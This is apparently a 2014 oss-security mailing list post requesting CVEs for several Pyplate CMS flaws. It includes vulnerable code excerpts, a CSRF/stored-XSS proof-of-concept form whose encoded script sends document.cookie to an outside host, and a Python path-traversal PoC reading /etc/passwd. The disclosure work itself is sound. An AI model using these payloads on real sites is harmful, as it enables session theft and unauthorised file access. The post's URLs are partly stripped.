Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 14 May 2014 14:21:21 +0300
From: Henri Salo <>
Cc:, abuse@...LATE.COM,
Subject: CVE request: Pyplate multiple vulnerabilities

Hello list,

My friend Teemu V. "requested" security audit for Pyplate. While quickly
checking quality of this software I noticed following issues. This is not a full
security audit as I don't have much free time.

Tested version: v0.08 (still beta)
Vendor notification: 2014-05-13

Issue 1.

Installation instruction tells user to execute following commands without
checking any checksums or similar:

> wget
> chmod +x ./
> sudo ./

Issue 2.

File /usr/lib/cgi-bin/ creates passwd.db for admin user
password with world readable permissions. I like that salt :]

 20     salt="bla"
 22     hash=crypt.crypt(random_string,'$6$'+salt+'$')
 23     usercredentials="admin:"+hash
 25     passwdf=open("./passwd.db",'w')
 26     passwdf.write(usercredentials)
 27     passwdf.close() 

-rw-r--r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db

Issue 3.

Application is not using HttpOnly (nor Secure) flag in cookie "id".

Issue 4.

CSRF + XSS with cookie stealing PoC:

    <form action="" method="POST">
      <input type="hidden" name="title" value="&lt;script&gt;new&#32;Image&#40;&#41;&#46;src&#61;&quot;http&#58;&#47;&#47;bugs&#46;fi&#47;evil&#46;py&#63;cookie&#61;&quot;&#32;encodeURI&#40;document&#46;cookie&#41;&#59;&lt;&#47;script&gt;" />
      <input type="hidden" name="file" value="bugs" />
      <input type="hidden" name="category" value="&#47;" />
      <input type="hidden" name="post" value="&lt;p&gt;bugs&lt;&#47;p&gt;&#13;&#10;" />
      <input type="hidden" name="tags" value="" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="state" value="new" />
      <input type="submit" value="Submit request" />

There is no CSRF protection and most of admin functionality contain stored XSS

Issue 5.

File /usr/lib/cgi-bin/ is used to download backup file from
installation after admin has created it in web-ui. Note the comment.

 21 # need to check that the filename doesn't contain slashes
 26     path = pyplate.getCMSRoot() + "/backup/" + filename
 27     file = open (path, 'rb')

Normally HTTP POST message looks like:

POST /cgi-bin/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40


Attacker can use this without authentication to download arbitrary files from
the system. File needs to be readable by web server process. PoC for /etc/passwd

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
payload = {'filename': '../../../../etc/passwd'}
r ='',
print r.text

If author responds with fixed in version I can coordinate this and send email to
abuse@ address for all users (which is not that many currently).

Henri Salo

Download attachment "signature.asc" of type "application/pgp-signature" (199 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.